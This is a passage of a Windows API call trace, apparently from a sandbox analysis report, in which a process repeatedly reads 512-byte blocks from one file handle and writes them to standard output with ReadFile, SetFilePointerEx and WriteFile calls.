0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.824] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.824] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.825] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.825] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.827] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.827] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.828] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.828] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.830] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.830] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.831] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.831] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.832] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.832] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, 